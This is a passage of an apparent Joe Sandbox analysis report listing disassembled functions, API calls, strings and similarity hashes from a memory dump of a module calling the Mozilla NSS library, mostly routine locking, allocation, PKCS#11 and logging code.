Part of subcall function 6C809890: TlsGetValue.KERNEL32(?,?,?,6C8097EB), ref: 6C80989E

EnterCriticalSection.KERNEL32(?), ref: 6C85AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C85AFCE
PR_SetPollableEvent.NSS3(?), ref: 6C85AFD9
EnterCriticalSection.KERNEL32(?), ref: 6C85AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C85B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C85B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C85B070
PR_JoinThread.NSS3(?), ref: 6C85B07B
free.MOZGLUE(?), ref: 6C85B084
EnterCriticalSection.KERNEL32(?), ref: 6C85B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C85B0C4
PR_JoinThread.NSS3(?), ref: 6C85B0F3
free.MOZGLUE(?), ref: 6C85B0FC
PR_JoinThread.NSS3(?), ref: 6C85B137
free.MOZGLUE(?), ref: 6C85B140

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 3a4e1f94f92eee45fe86f325ba8b79f2611cd60e50ed5d787868cf1c77f05126
Instruction ID: f54546bdea711785cbd775fead2f7b286cf910704539b85ec34e8d0dce0e0dfb
Opcode Fuzzy Hash: 3a4e1f94f92eee45fe86f325ba8b79f2611cd60e50ed5d787868cf1c77f05126
Instruction Fuzzy Hash: A691AEB5A00611CFCB60DF18C980856BBF1FF5931876989B9D8195BB22E732FC55CB90

Function 6C758DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C758E22
EnterCriticalSection.KERNEL32(?), ref: 6C758E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C758E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C758E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C758E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C758EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C758EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C758EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C758F00
free.MOZGLUE(?), ref: 6C758F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C758F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C758F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C758F5B
PR_Unlock.NSS3(?), ref: 6C758F72
PR_Unlock.NSS3(?), ref: 6C758F82

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 6dbddcf596f9023f7e0b6a54e715c3415c7226f9824da759bd1a2e3fe3f7b9d6
Instruction ID: 2d6e40dadf62977ff5dfff95b4b19e78da386b08fb40c2695f30a15408bc0b03
Opcode Fuzzy Hash: 6dbddcf596f9023f7e0b6a54e715c3415c7226f9824da759bd1a2e3fe3f7b9d6
Instruction Fuzzy Hash: C15125B2E40205AFE7109F68CE8496EB7B9EF45358F54453AE8089B700EB31ED25C7D1

Function 6C77CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C77CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C77CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C77CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C77CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C77CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C77CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C77CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C77CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C77CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C77CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C77CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C77CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C77CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C77D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C77D021

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: eebda93fd07d5feefb83e3e43226a8116677ed4eb2b10dae226df535557bdd71
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: D8318F71B9791423EF1D205AAF6DBDE105A4B6630EF04103CF90AFA7C0F6C59A1B42A9

Function 6C850FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C851000

Part of subcall function 6C809BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C731A48), ref: 6C809BB3
Part of subcall function 6C809BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C731A48), ref: 6C809BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C851016

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PR_Unlock.NSS3(?), ref: 6C851021

Part of subcall function 6C7EDD70: TlsGetValue.KERNEL32 ref: 6C7EDD8C
Part of subcall function 6C7EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7EDDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C851046
PR_Unlock.NSS3(?), ref: 6C85106B
PR_Lock.NSS3 ref: 6C851079
PR_Unlock.NSS3 ref: 6C851096
free.MOZGLUE(?), ref: 6C8510A7
free.MOZGLUE(?), ref: 6C8510B4
PR_DestroyCondVar.NSS3(?), ref: 6C8510BF
PR_DestroyCondVar.NSS3(?), ref: 6C8510CA
PR_DestroyCondVar.NSS3(?), ref: 6C8510D5
PR_DestroyCondVar.NSS3(?), ref: 6C8510E0
PR_DestroyLock.NSS3(?), ref: 6C8510EB
free.MOZGLUE(?), ref: 6C851105

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: a21f950a398fd40b148f3df51bf8e7343ddbecb07a8309729371db50afc7ef68
Instruction ID: d0dadc1cd27c318722a8a269ebad820b416b4b18e0efcebe469e19be9199621c
Opcode Fuzzy Hash: a21f950a398fd40b148f3df51bf8e7343ddbecb07a8309729371db50afc7ef68
Instruction Fuzzy Hash: 2931ADB6900405ABDB22AF14FE4AA45BB71BF0132DB484531E80942F61E772FD78DBC2

Function 6C7B4DB0 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C7B4DCB

Part of subcall function 6C7A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7487ED,00000800,6C73EF74,00000000), ref: 6C7A1000
Part of subcall function 6C7A0FF0: PR_NewLock.NSS3(?,00000800,6C73EF74,00000000), ref: 6C7A1016
Part of subcall function 6C7A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7487ED,00000008,?,00000800,6C73EF74,00000000), ref: 6C7A102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C7B4DE1

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C7B4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B4E59

Part of subcall function 6C79FAB0: free.MOZGLUE(?,-00000001,?,?,6C73F673,00000000,00000000), ref: 6C79FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C87300C,00000000), ref: 6C7B4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C7B4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C7B4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7B521A

Strings

/G6/, xrefs: 6C7B4DBC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID: /G6/
API String ID: 1025791883-570549270
Opcode ID: 68552f2652e1e6013a7f7f510e834c890531af5fcaf02e8c247e7a3cbee8a51c
Instruction ID: 40df185a4bba5269edcd0cc74042395945c56adf305fd31b14ef0163fb41fd8d
Opcode Fuzzy Hash: 68552f2652e1e6013a7f7f510e834c890531af5fcaf02e8c247e7a3cbee8a51c
Instruction Fuzzy Hash: A3F17A71E00209CFDB04CF58EA407AEB7B2FF48358F258169E915AB781E735E981CB90

Function 6C77ADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C77ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C77AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C77AE29

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C77AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C77AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C77AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C77AEA0

Strings

(CK_INVALID_HANDLE), xrefs: 6C77AE1F, 6C77AE80
hKey = 0x%x, xrefs: 6C77AE62, 6C77AE72
/G6/, xrefs: 6C77ADCC
C_MessageSignInit, xrefs: 6C77ADE1
hSession = 0x%x, xrefs: 6C77AE01, 6C77AE11

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$/G6/$C_MessageSignInit
API String ID: 332880674-2016036812
Opcode ID: 5c5c389c40d30a17e33d16ca75f9b5ec1d341d4e92ba51829f3b8e28c185941a
Instruction ID: 57f88992afb2b6b5f7971e36748dcc51ee6da65d51420b5be8115e7dbec68e33
Opcode Fuzzy Hash: 5c5c389c40d30a17e33d16ca75f9b5ec1d341d4e92ba51829f3b8e28c185941a
Instruction Fuzzy Hash: 5831B572601108ABDF309B65EE4DBAE3779AB4631DF444835F80967B01D774A848DBE2

Function 6C772DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C772DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C772E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C772E33

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C772E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C772E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C772E81

Strings

(CK_INVALID_HANDLE), xrefs: 6C772E2C
ulPinLen = %d, xrefs: 6C772E7C
C_InitPIN, xrefs: 6C772DF1
pPin = 0x%p, xrefs: 6C772E63
/G6/, xrefs: 6C772DDC
hSession = 0x%x, xrefs: 6C772E0E, 6C772E1E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$/G6/$C_InitPIN
API String ID: 1003633598-4256835284
Opcode ID: 56f6068ac4de056d6ccffc17ced428b2c35de786db852b9ac6a3f0340833e7eb
Instruction ID: 63de1e45e5c0902b500abd90d54814a4b5437919e242a54a29adb804ffb0fa4c
Opcode Fuzzy Hash: 56f6068ac4de056d6ccffc17ced428b2c35de786db852b9ac6a3f0340833e7eb
Instruction Fuzzy Hash: D731D471601158EBDF308B65AF4CB9E3779EB4231CF444434E819A7B11DB34A948CBE2

Function 6C776EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C776F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C776F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C776F53

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C776F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C776F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C776FA1

Strings

(CK_INVALID_HANDLE), xrefs: 6C776F4C
/G6/, xrefs: 6C776EFC
C_DigestUpdate, xrefs: 6C776F11
hSession = 0x%x, xrefs: 6C776F2E, 6C776F3E
pPart = 0x%p, xrefs: 6C776F83
ulPartLen = %d, xrefs: 6C776F9C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$/G6/$C_DigestUpdate
API String ID: 1003633598-3680883531
Opcode ID: 0e1109e9c45da4bf738d742bf8e83f7e3614fea571754c8b36773ed43461bc6f
Instruction ID: df91fb0e3e042948bac7cd1f9b3addbe582f4e3a03efe739fe00935df1a8c9c2
Opcode Fuzzy Hash: 0e1109e9c45da4bf738d742bf8e83f7e3614fea571754c8b36773ed43461bc6f
Instruction Fuzzy Hash: F531A1756011189BDF309B65EE4CB9E37B1EB4231DF444835E80DA7B12DB34A948CAE2

Function 6C85C8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000020), ref: 6C85C8B9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C85C8DA
malloc.MOZGLUE(00000001), ref: 6C85C8E4
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C85C8F8
PR_NewLock.NSS3 ref: 6C85C909
PR_NewCondVar.NSS3(00000000), ref: 6C85C918
PR_NewCondVar.NSS3(00000000), ref: 6C85C92A

Part of subcall function 6C730F00: PR_GetPageSize.NSS3(6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F1B
Part of subcall function 6C730F00: PR_NewLogModule.NSS3(clock,6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F25

free.MOZGLUE(00000000), ref: 6C85C947

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
String ID:
API String ID: 2931242645-0
Opcode ID: 33aaef4fff520d058344d8cc3b2e964856e735a9dcffd5c7f2c7f96349f2ac6a
Instruction ID: b7b54261d3628a01a9367fb0882434f32a05ccd73abd4695cf3863aa36275344
Opcode Fuzzy Hash: 33aaef4fff520d058344d8cc3b2e964856e735a9dcffd5c7f2c7f96349f2ac6a
Instruction Fuzzy Hash: EE21E5F1A002065BEB70AF7D9D0965B76F8AF0525CF440938E85AC2B02E775E524CBE6

Function 6C73AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C73AF47

Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C8090AB
Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C8090C9
Part of subcall function 6C809090: EnterCriticalSection.KERNEL32 ref: 6C8090E5
Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C809116
Part of subcall function 6C809090: LeaveCriticalSection.KERNEL32 ref: 6C80913F

FreeLibrary.KERNEL32(?), ref: 6C73AF6D
free.MOZGLUE(?), ref: 6C73AFA4
free.MOZGLUE(?), ref: 6C73AFAA
PR_ExitMonitor.NSS3 ref: 6C73AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C73AFF5
PR_ExitMonitor.NSS3 ref: 6C73B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C73B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C73B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C73B03C

Strings

%s decr => %d, xrefs: 6C73AFF0
Unloaded library %s, xrefs: 6C73B023

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: ef5ee30ca7aea6c8030304b84c49a31396f1112fa8b7bed1f70db5d327f47f20
Instruction ID: 6a7fac4194be043665c71554b93639bb56c97d466869cbc8dbb289ea88bff06a
Opcode Fuzzy Hash: ef5ee30ca7aea6c8030304b84c49a31396f1112fa8b7bed1f70db5d327f47f20
Instruction Fuzzy Hash: 8E3129B5B04122ABDB219FA5EE45A09B774EF0532CB185635E80D97A02F322E824C7E1

Function 6C786C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C78781D,00000000,6C77BE2C,?,6C786B1D,?,?,?,?,00000000,00000000,6C78781D), ref: 6C786C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C78781D,?,6C77BE2C,?), ref: 6C786C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C78781D), ref: 6C786C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C786C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C786C96

Part of subcall function 6C731240: TlsGetValue.KERNEL32(00000040,?,6C73116C,NSPR_LOG_MODULES), ref: 6C731267
Part of subcall function 6C731240: EnterCriticalSection.KERNEL32(?,?,?,6C73116C,NSPR_LOG_MODULES), ref: 6C73127C
Part of subcall function 6C731240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C73116C,NSPR_LOG_MODULES), ref: 6C731291
Part of subcall function 6C731240: PR_Unlock.NSS3(?,?,?,?,6C73116C,NSPR_LOG_MODULES), ref: 6C7312A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C786CAA

Strings

NSS_DEFAULT_DB_TYPE, xrefs: 6C786C91
extern:, xrefs: 6C786C7E
rdb:, xrefs: 6C786C69
dbm, xrefs: 6C786CA4
sql:, xrefs: 6C786C52
dbm:, xrefs: 6C786C3A

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 4ae7f5677f868fbbea9d0986d6b77e757c6d794c2ad8a8d63a6202d796aae918
Instruction ID: 4e8d699dd88a214963dfffff706e02c9f14c54e62d1da3ded506bb97a7f2290b
Opcode Fuzzy Hash: 4ae7f5677f868fbbea9d0986d6b77e757c6d794c2ad8a8d63a6202d796aae918
Instruction Fuzzy Hash: 890184A170331137E9202A6A5F49F16295C9B8215CF140831FF05E1E42EE96EA1480A5

Function 6C794E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C7578F8), ref: 6C794E6D

